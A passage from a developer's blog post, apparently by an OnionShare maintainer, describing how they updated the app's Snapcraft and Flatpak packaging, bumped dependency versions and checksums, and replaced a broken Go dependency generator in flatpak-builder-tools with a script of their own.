Executed: skip pull libevent (already ran)
Executed: skip pull meek-client (already ran)
Executed: skip pull obfs4 (already ran)
Executed: skip pull snowflake-client (already ran)
Executed: skip pull tor (already ran)
Executed: skip pull onionshare-cli (already ran)
Stage package not found in part 'onionshare': qml6-module-qtquick3d-spatialaudio.
Failed to execute pack in instance.
Full execution log: '/home/user/.local/state/snapcraft/log/snapcraft-20230905-172355.921802.log'
</code></pre>
<p>After some invesigation, I found that <code>qml6-module-qtquick3d-spatialaudio</code> is in the Ubuntu <code>universe</code> repo, not the <code>main</code> one. I don't think OnionShare actually uses that one though, so I decided to just remove it and try again. This time there are fewer lint warnings about missing dependencies:</p>
<pre><code>Lint warnings:
- library: lib/python3.10/site-packages/PySide6/Qt/qml/QtQuick3D/Helpers/impl/libqtquick3dhelpersimplplugin.so: missing dependency 'libQt6Quick3DHelpersImpl.so.6'. (https://snapcraft.io/docs/linters-library)
- library: lib/python3.10/site-packages/PySide6/Qt/qml/QtQuick3D/SpatialAudio/libquick3dspatialaudioplugin.so: missing dependency 'libQt6Quick3DSpatialAudio.so.6'. (https://snapcraft.io/docs/linters-library)
</code></pre>
<p>Now let's try running it:</p>
<pre><code>$ /snap/bin/onionshare
╭───────────────────────────────────────────╮
│ * ▄▄█████▄▄ * │
│ ▄████▀▀▀████▄ * │
│ ▀▀█▀ ▀██▄ │
│ * ▄█▄ ▀██▄ │
│ ▄█████▄ ███ -+- │
│ ███ ▀█████▀ │
│ ▀██▄ ▀█▀ │
│ * ▀██▄ ▄█▄▄ * │
│ * ▀████▄▄▄████▀ │
│ ▀▀█████▀▀ │
│ -+- * │
│ ▄▀▄ ▄▀▀ █ │
│ █ █ ▀ ▀▄ █ │
│ █ █ █▀▄ █ ▄▀▄ █▀▄ ▀▄ █▀▄ ▄▀▄ █▄▀ ▄█▄ │
│ ▀▄▀ █ █ █ ▀▄▀ █ █ ▄▄▀ █ █ ▀▄█ █ ▀▄▄ │
│ │
│ v2.6.1 │
│ │
│ https://onionshare.org/ │
╰───────────────────────────────────────────╯
Failed to create wl_display (No such file or directory)
qt.qpa.plugin: Could not load the Qt platform plugin "wayland" in "" even though it was found.
Gtk-Message: 19:24:23.370: Failed to load module "canberra-gtk-module"
Gtk-Message: 19:24:23.370: Failed to load module "canberra-gtk-module"
</code></pre>
<p>And it worked!</p>
<p><img src="onionshare-snapcraft.png" alt="OnionShare running in Snapcraft"></p>
<p>I successfully connected to Tor, and I quickly tested it, and everything appears to work.</p>
<p>But there's one more thing I want to do. In the previous version of the snap package, I had an extra <code>launcher</code> component that set some environment variables before running <code>onionshare</code> or <code>onionshare-cli</code>, but I don't think that's necessary anymore. Instead I can simplify things just by updating the <code>PATH</code> and <code>LD_LIBRARY_PATH</code> to add <code>$SNAP/usr/local</code> paths to them. So, I've deleted the whole <code>launcher</code> part and updated the two apps to no longer use the launcher, and to update environment variables :</p>
<div class="hll"><pre><span></span><span class="nt">apps</span><span class="p">:</span>
<span class="w"> </span><span class="nt">onionshare</span><span class="p">:</span>
<span class="w"> </span><span class="nt">common-id</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">org.onionshare.OnionShare</span>
<span class="w"> </span><span class="nt">command</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">bin/onionshare</span>
<span class="w"> </span><span class="nt">plugs</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">desktop</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">home</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">network</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">network-bind</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">removable-media</span>
<span class="w"> </span><span class="nt">environment</span><span class="p">:</span>
<span class="w"> </span><span class="nt">LANG</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">C.UTF-8</span>
<span class="w"> </span><span class="nt">PATH</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">$SNAP/bin:$SNAP/usr/bin:$SNAP/usr/local/bin:$PATH</span>
<span class="w"> </span><span class="nt">LD_LIBRARY_PATH</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">$LD_LIBRARY_PATH:$SNAP/usr/local/lib</span>
<span class="w"> </span><span class="nt">cli</span><span class="p">:</span>
<span class="w"> </span><span class="nt">common-id</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">org.onionshare.OnionShareCli</span>
<span class="w"> </span><span class="nt">command</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">bin/onionshare-cli</span>
<span class="w"> </span><span class="nt">plugs</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">home</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">network</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">network-bind</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">removable-media</span>
<span class="w"> </span><span class="nt">environment</span><span class="p">:</span>
<span class="w"> </span><span class="nt">LANG</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">C.UTF-8</span>
<span class="w"> </span><span class="nt">PATH</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">$SNAP/bin:$SNAP/usr/bin:$SNAP/usr/local/bin:$PATH</span>
<span class="w"> </span><span class="nt">LD_LIBRARY_PATH</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">$LD_LIBRARY_PATH:$SNAP/usr/local/lib</span>
</pre></div>
<p>I built another snap, installed it, and tested it one more time, and it worked! Time to commit my code.</p>
<h2 id="making-sure-the-flatpak-packaging-works">Making sure the Flatpak packaging works</h2><p>With Snapcraft done, let's take a look at Flatpak. The <a href="https://github.com/onionshare/onionshare/blob/main/flatpak/org.onionshare.OnionShare.yaml">Flatpak manifest file</a> is in <code>flatpak/org.onionshare.OnionShare.yaml</code>. To update the Flatpak package I basically need to upgrade all of the dependencies listed in the manifest, including the URLs to download them from and their sha256 checksums.</p>
<p>But first, I'm going to make sure I have <code>flatpak</code> and <code>flatpak-builder</code> installed, and make sure the Flathub repository is added:</p>
<div class="hll"><pre><span></span>sudo<span class="w"> </span>apt<span class="w"> </span>install<span class="w"> </span>flatpak<span class="w"> </span>flatpak-builder
flatpak<span class="w"> </span>remote-add<span class="w"> </span>--if-not-exists<span class="w"> </span>flathub<span class="w"> </span>https://dl.flathub.org/repo/flathub.flatpakrepo
</pre></div>
<h3 id="updating-pyside6">Updating <code>pyside6</code></h3><p>I'll start with the the <code>pyside6</code> module, since that's at the top (luckily, I had already upgraded the Flatpak packaging from using PySide2 to PySide6). Here's the code for the PySide6 module:</p>
<div class="hll"><pre><span></span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">pyside6</span>
<span class="w"> </span><span class="nt">buildsystem</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">simple</span>
<span class="w"> </span><span class="nt">build-commands</span><span class="p">:</span><span class="w"> </span><span class="p p-Indicator">[]</span>
<span class="w"> </span><span class="nt">modules</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">pyside6-essentials</span>
<span class="w"> </span><span class="nt">only-arches</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">x86_64</span>
<span class="w"> </span><span class="nt">buildsystem</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">simple</span>
<span class="w"> </span><span class="nt">build-commands</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">pip3 install --verbose --exists-action=i --no-index --find-links="file://${PWD}"</span>
<span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">--prefix=${FLATPAK_DEST} "pyside6-essentials" --no-build-isolation</span>
<span class="w"> </span><span class="nt">sources</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">type</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">file</span>
<span class="w"> </span><span class="nt">url</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">https://files.pythonhosted.org/packages/e5/96/f43cdcb397f8a8cff6991ef8109385cc5ad9b0ad78c6dc2988b3b776fe49/PySide6_Essentials-6.4.2-cp37-abi3-manylinux_2_28_x86_64.whl</span>
<span class="w"> </span><span class="nt">sha256</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">8c3d37cca6e27f6da12b50b20e741d593ccc857bdcdb82d97f8f7c8bfe53639a</span>
<span class="w"> </span><span class="nt">modules</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">shiboken6</span>
<span class="w"> </span><span class="nt">buildsystem</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">simple</span>
<span class="w"> </span><span class="nt">build-commands</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">pip3 install --verbose --exists-action=i --no-index --find-links="file://${PWD}"</span>
<span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">--prefix=${FLATPAK_DEST} "shiboken6" --no-build-isolation</span>
<span class="w"> </span><span class="nt">sources</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">type</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">file</span>
<span class="w"> </span><span class="nt">url</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">https://files.pythonhosted.org/packages/24/f6/f1fe9220a616789a1c6b1b73670d8b1dec882ac730a8b534f963b3f26182/shiboken6-6.4.2-cp37-abi3-manylinux_2_28_x86_64.whl</span>
<span class="w"> </span><span class="nt">sha256</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">0616c1a12d1e51e680595b3940b986275c1df952a751416a0730a59e5b90105f</span>
</pre></div>
<p>This essentially installs two Python modules, <a href="https://pypi.org/project/PySide6-Essentials/">PySide6-Essentials</a> and <a href="https://pypi.org/project/shiboken6/">shiboken6</a> from PyPI--these are binary packages that are pre-compiled for x86_64 architectures. Flatpak downloads the <code>whl</code> files from the URLs provided and verifies the sha256 checksums, and runs the build commands to install them. Since <code>pyside6-essentials</code> has <code>shiboken6</code> as a dependency, <code>shiboken6</code> is listed under modules under <code>pyside6-essentials</code>.</p>
<p>To update this, I just need to check PyPI for the latest versions of both of these packages and update the URL and sha256 checksums. The latest version of <code>pyside6-essentials</code> is 6.5.2, and the latest version of <code>shiboken6</code> is also 6.5.2. You can find links to the package files, along with their checksums, on the PyPI pages for those packages under "Download files".</p>
<p>So I updated those. Just to make it clear, here's the diff:</p>
<div class="hll"><pre><span></span><span class="gh">diff --git a/flatpak/org.onionshare.OnionShare.yaml b/flatpak/org.onionshare.OnionShare.yaml</span>
<span class="gh">index b455cb71..9d0f0cb5 100644</span>
<span class="gd">--- a/flatpak/org.onionshare.OnionShare.yaml</span>
<span class="gi">+++ b/flatpak/org.onionshare.OnionShare.yaml</span>
<span class="gu">@@ -35,8 +35,8 @@ modules:</span>
<span class="w"> </span> --prefix=${FLATPAK_DEST} "pyside6-essentials" --no-build-isolation
<span class="w"> </span> sources:
<span class="w"> </span> - type: file
<span class="gd">- url: https://files.pythonhosted.org/packages/e5/96/f43cdcb397f8a8cff6991ef8109385cc5ad9b0ad78c6dc2988b3b776fe49/PySide6_Essentials-6.4.2-cp37-abi3-manylinux_2_28_x86_64.whl</span>
<span class="gd">- sha256: 8c3d37cca6e27f6da12b50b20e741d593ccc857bdcdb82d97f8f7c8bfe53639a</span>
<span class="gi">+ url: https://files.pythonhosted.org/packages/d0/de/9a089e91c2e0fe4f122218bba4f9dbde46338659f412739bd9db1ed9df4f/PySide6_Essentials-6.5.2-cp37-abi3-manylinux_2_28_x86_64.whl</span>
<span class="gi">+ sha256: 1620e82b38714a1570b142c01694d0415a25526517b24620ff9b00c9f76cfca9</span>
<span class="w"> </span> modules:
<span class="w"> </span> - name: shiboken6
<span class="w"> </span> buildsystem: simple
<span class="gu">@@ -45,8 +45,8 @@ modules:</span>
<span class="w"> </span> --prefix=${FLATPAK_DEST} "shiboken6" --no-build-isolation
<span class="w"> </span> sources:
<span class="w"> </span> - type: file
<span class="gd">- url: https://files.pythonhosted.org/packages/24/f6/f1fe9220a616789a1c6b1b73670d8b1dec882ac730a8b534f963b3f26182/shiboken6-6.4.2-cp37-abi3-manylinux_2_28_x86_64.whl</span>
<span class="gd">- sha256: 0616c1a12d1e51e680595b3940b986275c1df952a751416a0730a59e5b90105f</span>
<span class="gi">+ url: https://files.pythonhosted.org/packages/55/44/d8c366dd4f069166ab9890acb44d004c5e6122714e44c169273dcbbca897/shiboken6-6.5.2-cp37-abi3-manylinux_2_28_x86_64.whl</span>
<span class="gi">+ sha256: 3fbc35ff3c19e7d39433671bfc1be3d7fa9d071bfdd0ffe1c2a4d27acd6cf6a5</span>
<span class="w"> </span> - name: tor
<span class="w"> </span> buildsystem: autotools
<span class="w"> </span> sources:
</pre></div>
<h3 id="updating-tor">Updating <code>tor</code></h3><p>The process to upgrade the version of tor installed in the <code>tor</code> module is similar, but this time the <code>buildsystem</code> is set to <code>autotools</code>, which means it will basically run <code>./configure</code>, <code>make</code>, and <code>make install</code> to compile it from source. The <code>tor</code> module has its own <code>modules</code> section which lists <code>libevent</code> a dependency of tor.</p>
<p>To update it, I just need to update the tor source package URL and sha256 hash, along with the libevent source package URL and sha256 hash. I already did this same thing for the Snapcraft package, so I'm just copying the URLs and sha256 checksums from <code>snapcraft.yaml</code>.</p>
<h3 id="trying-to-update-obfs4proxy-meek-client-and-snowflake-client">Trying to update <code>obfs4proxy</code>, <code>meek-client</code>, and <code>snowflake-client</code></h3><p>These three pluggable transports are all written in Go, and they all have dependencies of their own. This is where I'm going to start relying on <a href="https://github.com/flatpak/flatpak-builder-tools/">flatpak-builder-tools</a>, a collection of scripts that make this work much simpler.</p>
<p>In another folder, I clone the repo:</p>
<div class="hll"><pre><span></span>git<span class="w"> </span>clone<span class="w"> </span>https://github.com/flatpak/flatpak-builder-tools.git
<span class="nb">cd</span><span class="w"> </span>flatpak-builder-tools
</pre></div>
<p>This project includes <a href="https://github.com/flatpak/flatpak-builder-tools/tree/master/go-get">Go Get Generator</a> in the <code>go-get</code> folder, with unfortunately rather convoluted instructions. For each of these go dependencies, I need to:</p>
<ul>
<li>Create a new Flatpak manifest file just for the one go dependency, with network access available during the build, and run the <code>go get</code> command</li>
<li>Run <code>flatpak-builder</code> with the <code>--keep-build-dirs</code> flag, which will download all of the dependencies for the go project and keep them when it's done building</li>
<li>Run the <code>flatpak-go-get-generator.py</code> script to create a Flatpak manifest file that actually includes all of these dependencies (their git repo URLs and commit IDs)--though, it will generate the manifest in JSON format</li>
<li>Convert the manifest it generates from JSON into YAML, and copy and it paste it into the OnionShare Flatpak manifest YAML file</li>
</ul>
<p>I know from my Snapcraft work that there are no new versions of <code>obfs4proxy</code>, but I do need to upgrade <code>meek-client</code> and <code>snowflake-client</code>. Let's start with <code>meek-client</code>.</p>
<p>I'm starting by making a new file called <code>meek-client.yaml</code> and copying and pasting code from the Go Get Generator readme, except changing the <code>go get</code> build command to point to <code>git.torproject.org/pluggable-transports/meek.git/meek-client@v0.38.0</code>.</p>
<p>But then when I tried running the <code>flatpak-builder</code> command, I kept get errors. It's been a long time since I last did this and I don't quite remember how I got it working...</p>
<p><em>🎵 Debugging noises... 🎵</em></p>
<p>After much trial and error--including learning that the <code>go get</code> syntax itself is <a href="https://go.dev/doc/go-get-install-deprecation">now deprecated</a> in favor of <code>go install</code> (I'm not much of a Go programmer)--I got <code>flatpak-builder</code> to work with this manifest file:</p>
<div class="hll"><pre><span></span><span class="nt">app-id</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">com.example.meek-client</span>
<span class="nt">runtime</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">org.freedesktop.Platform</span>
<span class="nt">runtime-version</span><span class="p">:</span><span class="w"> </span><span class="s">'21.08'</span>
<span class="nt">sdk</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">org.freedesktop.Sdk</span>
<span class="nt">sdk-extensions</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">org.freedesktop.Sdk.Extension.golang</span>
<span class="nt">modules</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">meek-client</span>
<span class="w"> </span><span class="nt">buildsystem</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">simple</span>
<span class="w"> </span><span class="nt">build-options</span><span class="p">:</span>
<span class="w"> </span><span class="nt">append-path</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">/usr/lib/sdk/golang/bin</span>
<span class="w"> </span><span class="nt">env</span><span class="p">:</span>
<span class="w"> </span><span class="nt">GOBIN</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">/app/bin</span>
<span class="w"> </span><span class="nt">GO111MODULE</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">on</span>
<span class="w"> </span><span class="nt">GOPATH</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">/run/build/meek-client</span>
<span class="w"> </span><span class="nt">build-args</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">--share=network</span>
<span class="w"> </span><span class="nt">build-commands</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">go install git.torproject.org/pluggable-transports/meek.git/meek-client@v0.38.0</span>
</pre></div>
<p>I built it with <code>flatpak-builder</code> by running:</p>
<div class="hll"><pre><span></span>$<span class="w"> </span>flatpak-builder<span class="w"> </span>build<span class="w"> </span>--force-clean<span class="w"> </span>--install-deps-from<span class="o">=</span>flathub<span class="w"> </span>--keep-build-dirs<span class="w"> </span>./meek-client.yaml
Dependency<span class="w"> </span>Sdk:<span class="w"> </span>org.freedesktop.Sdk<span class="w"> </span><span class="m">21</span>.08
Updating<span class="w"> </span>org.freedesktop.Sdk/x86_64/21.08
Nothing<span class="w"> </span>to<span class="w"> </span><span class="k">do</span>.
Dependency<span class="w"> </span>Runtime:<span class="w"> </span>org.freedesktop.Platform<span class="w"> </span><span class="m">21</span>.08
Updating<span class="w"> </span>org.freedesktop.Platform/x86_64/21.08
Nothing<span class="w"> </span>to<span class="w"> </span><span class="k">do</span>.
Dependency<span class="w"> </span>Extension:<span class="w"> </span>org.freedesktop.Sdk.Extension.golang<span class="w"> </span><span class="m">21</span>.08
Updating<span class="w"> </span>org.freedesktop.Sdk.Extension.golang/x86_64/21.08
Nothing<span class="w"> </span>to<span class="w"> </span><span class="k">do</span>.
Downloading<span class="w"> </span>sources
Initializing<span class="w"> </span>build<span class="w"> </span>dir
Committing<span class="w"> </span>stage<span class="w"> </span>init<span class="w"> </span>to<span class="w"> </span>cache
Starting<span class="w"> </span>build<span class="w"> </span>of<span class="w"> </span>com.example.meek-client
<span class="o">========================================================================</span>
Building<span class="w"> </span>module<span class="w"> </span>meek-client<span class="w"> </span><span class="k">in</span><span class="w"> </span>/home/user/code/flatpak-builder-tools/go-get/.flatpak-builder/build/meek-client-1
<span class="o">========================================================================</span>
Running:<span class="w"> </span>go<span class="w"> </span>install<span class="w"> </span>git.torproject.org/pluggable-transports/meek.git/meek-client@v0.38.0
go:<span class="w"> </span>downloading<span class="w"> </span>git.torproject.org/pluggable-transports/meek.git<span class="w"> </span>v0.38.0
go:<span class="w"> </span>downloading<span class="w"> </span>git.torproject.org/pluggable-transports/goptlib.git<span class="w"> </span>v1.1.0
go:<span class="w"> </span>downloading<span class="w"> </span>golang.org/x/net<span class="w"> </span>v0.0.0-20220909164309-bea034e7d591
go:<span class="w"> </span>downloading<span class="w"> </span>github.com/refraction-networking/utls<span class="w"> </span>v1.1.5
go:<span class="w"> </span>downloading<span class="w"> </span>golang.org/x/crypto<span class="w"> </span>v0.0.0-20220829220503-c86fa9a7ed90
go:<span class="w"> </span>downloading<span class="w"> </span>github.com/klauspost/compress<span class="w"> </span>v1.15.9
go:<span class="w"> </span>downloading<span class="w"> </span>github.com/andybalholm/brotli<span class="w"> </span>v1.0.4
go:<span class="w"> </span>downloading<span class="w"> </span>golang.org/x/text<span class="w"> </span>v0.3.7
go:<span class="w"> </span>downloading<span class="w"> </span>golang.org/x/sys<span class="w"> </span>v0.0.0-20220728004956-3c1f35247d10
debugedit:<span class="w"> </span>/home/user/code/flatpak-builder-tools/go-get/.flatpak-builder/rofiles/rofiles-Y6o1sc/files/bin/meek-client:<span class="w"> </span>DWARF<span class="w"> </span>version<span class="w"> </span><span class="m">0</span><span class="w"> </span>unhandled
compressing<span class="w"> </span>debuginfo<span class="w"> </span><span class="k">in</span>:<span class="w"> </span>/home/user/code/flatpak-builder-tools/go-get/.flatpak-builder/rofiles/rofiles-Y6o1sc/files/bin/meek-client
processing:<span class="w"> </span>/home/user/code/flatpak-builder-tools/go-get/.flatpak-builder/rofiles/rofiles-Y6o1sc/files/bin/meek-client
<span class="o">[</span><span class="m">25</span><span class="o">]</span><span class="w"> </span>.debug_abbrev<span class="w"> </span>compressed<span class="w"> </span>-><span class="w"> </span>.zdebug_abbrev<span class="w"> </span><span class="o">(</span><span class="nv">307</span><span class="w"> </span><span class="o">=</span>><span class="w"> </span><span class="m">289</span><span class="w"> </span><span class="m">94</span>.14%<span class="o">)</span>
<span class="o">[</span><span class="m">26</span><span class="o">]</span><span class="w"> </span>.debug_line<span class="w"> </span>compressed<span class="w"> </span>-><span class="w"> </span>.zdebug_line<span class="w"> </span><span class="o">(</span><span class="nv">529246</span><span class="w"> </span><span class="o">=</span>><span class="w"> </span><span class="m">485044</span><span class="w"> </span><span class="m">91</span>.65%<span class="o">)</span>
<span class="o">[</span><span class="m">27</span><span class="o">]</span><span class="w"> </span>.debug_frame<span class="w"> </span>compressed<span class="w"> </span>-><span class="w"> </span>.zdebug_frame<span class="w"> </span><span class="o">(</span><span class="nv">104484</span><span class="w"> </span><span class="o">=</span>><span class="w"> </span><span class="m">84780</span><span class="w"> </span><span class="m">81</span>.14%<span class="o">)</span>
<span class="o">[</span><span class="m">28</span><span class="o">]</span><span class="w"> </span>.debug_gdb_scripts<span class="w"> </span>NOT<span class="w"> </span>compressed,<span class="w"> </span>wouldn<span class="err">'</span>t<span class="w"> </span>be<span class="w"> </span>smaller
<span class="o">[</span><span class="m">29</span><span class="o">]</span><span class="w"> </span>.debug_info<span class="w"> </span>compressed<span class="w"> </span>-><span class="w"> </span>.zdebug_info<span class="w"> </span><span class="o">(</span><span class="nv">875910</span><span class="w"> </span><span class="o">=</span>><span class="w"> </span><span class="m">787285</span><span class="w"> </span><span class="m">89</span>.88%<span class="o">)</span>
<span class="o">[</span><span class="m">30</span><span class="o">]</span><span class="w"> </span>.debug_loc<span class="w"> </span>compressed<span class="w"> </span>-><span class="w"> </span>.zdebug_loc<span class="w"> </span><span class="o">(</span><span class="nv">671185</span><span class="w"> </span><span class="o">=</span>><span class="w"> </span><span class="m">536563</span><span class="w"> </span><span class="m">79</span>.94%<span class="o">)</span>
<span class="o">[</span><span class="m">31</span><span class="o">]</span><span class="w"> </span>.debug_ranges<span class="w"> </span>compressed<span class="w"> </span>-><span class="w"> </span>.zdebug_ranges<span class="w"> </span><span class="o">(</span><span class="nv">177308</span><span class="w"> </span><span class="o">=</span>><span class="w"> </span><span class="m">148978</span><span class="w"> </span><span class="m">84</span>.02%<span class="o">)</span>
<span class="o">[</span><span class="m">9</span><span class="o">]</span><span class="w"> </span>Updating<span class="w"> </span>section<span class="w"> </span>string<span class="w"> </span>table
stripping<span class="w"> </span>/home/user/code/flatpak-builder-tools/go-get/.flatpak-builder/rofiles/rofiles-Y6o1sc/files/bin/meek-client<span class="w"> </span>to<span class="w"> </span>/home/user/code/flatpak-builder-tools/go-get/.flatpak-builder/rofiles/rofiles-Y6o1sc/files/lib/debug/bin/meek-client.debug
Committing<span class="w"> </span>stage<span class="w"> </span>build-meek-client<span class="w"> </span>to<span class="w"> </span>cache
Cleaning<span class="w"> </span>up
Committing<span class="w"> </span>stage<span class="w"> </span>cleanup<span class="w"> </span>to<span class="w"> </span>cache
Finishing<span class="w"> </span>app
Using<span class="w"> </span>meek-client<span class="w"> </span>as<span class="w"> </span><span class="nb">command</span>
Please<span class="w"> </span>review<span class="w"> </span>the<span class="w"> </span>exported<span class="w"> </span>files<span class="w"> </span>and<span class="w"> </span>the<span class="w"> </span>metadata
Committing<span class="w"> </span>stage<span class="w"> </span>finish<span class="w"> </span>to<span class="w"> </span>cache
Pruning<span class="w"> </span>cache
</pre></div>
<p>This built this simple Flatpak package, which basically ran <code>go install</code> to download <code>meek-client</code> version 0.38.0, along with all of its dependencies, and then compile them. Now that I've done this, I should be able to use the <code>flatpak-go-get-generator.py</code> script to create the up-to-date <code>meek-client</code> module for me.</p>
<p>Finally, let's see the magic work:</p>
<pre><code>$ python3 flatpak-go-get-generator.py .flatpak-builder/build/meek-client/
Traceback (most recent call last):
File "/home/user/code/flatpak-builder-tools/go-get/flatpak-go-get-generator.py", line 92, in <module>
main()
File "/home/user/code/flatpak-builder-tools/go-get/flatpak-go-get-generator.py", line 82, in main
source_list = sources(args.build_dir)
^^^^^^^^^^^^^^^^^^^^^^^
File "/home/user/code/flatpak-builder-tools/go-get/flatpak-go-get-generator.py", line 68, in sources
return list(map(repo_source, repo_paths(build_dir)))
^^^^^^^^^^^^^^^^^^^^^
File "/home/user/code/flatpak-builder-tools/go-get/flatpak-go-get-generator.py", line 38, in repo_paths
for domain in domains:
File "/usr/lib/python3.11/pathlib.py", line 932, in iterdir
for name in os.listdir(self):
^^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory: '.flatpak-builder/build/meek-client/src'
</code></pre>
<p>Hmm. While I can see that my <code>.flatpak-builder/build/meek-client</code> folder does indeed have all of the dependencies for <code>meek-client</code> downloaded, there's not a <code>src</code> folder in sight. What's going on?</p>
<p><em>🎵 Debugging noises get louder... 🎵</em></p>
<p>So it turns out, due to changes in the go ecosystem, the Go Get Generator is <em>broken beyond repair</em>. It's supposed to, basically, download and build your Go package from source, and then look at all of the dependencies that it had to download and compile the list of Flatpak modules based on the git repos and the specific commits it used. But modern versions of Go doesn't seem to git clone all of the dependencies anymore.</p>
<h2 id="debugging-flatpak-builder-tools">Debugging flatpak-builder-tools</h2><p>Since I need to figure out how to finish making this Flatpak package, and the Go Get Generator in <code>flatpak-builder-tools</code> is broken, I decided to program my own replacement. I <a href="https://github.com/micahflee/flatpak-builder-tools">forked</a> the flatpak-builder-tools repo, deleted the broken <code>go-get</code> folder, created a new <code>go</code> folder, and wrote my own new script, <code>flatpak-go-deps.py</code>. <a href="https://github.com/flatpak/flatpak-builder-tools/pull/369">Here's my pull request</a> to flatpak-builder-tools project.</p>
<p>It's not merged upstream at the time of writing (it's still a draft PR), but in the meantime you can see the new code I contributed, including the readme, at <a href="https://github.com/micahflee/flatpak-builder-tools/tree/fix-go/go">https://github.com/micahflee/flatpak-builder-tools/tree/fix-go/go</a>. The script I wrote, at the moment, is 282 lines of code.</p>
<p>I'm going to start over with <code>meek-client</code>, but this time using my new script:</p>
<pre><code>$ ./flatpak-go-deps.py git.torproject.org/pluggable-transports/meek.git/meek-client@v0.38.0
go: creating new go.mod: module tempmod
Cloning into 'src/meek-client'...
warning: redirecting to https://gitlab.torproject.org/tpo/anti-censorship/pluggable-transports/meek.git/
remote: Enumerating objects: 2676, done.
remote: Counting objects: 100% (658/658), done.
remote: Compressing objects: 100% (281/281), done.
remote: Total 2676 (delta 372), reused 658 (delta 372), pack-reused 2018
Receiving objects: 100% (2676/2676), 549.97 KiB | 527.00 KiB/s, done.
Resolving deltas: 100% (1546/1546), done.
Note: switching to 'v0.38.0'.
You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by switching back to a branch.
If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -c with the switch command. Example:
git switch -c <new-branch-name>
Or undo this operation with:
git switch -
Turn off this advice by setting config variable advice.detachedHead to false
HEAD is now at 3be00b7 programVersion = "0.38.0"
build-commands:
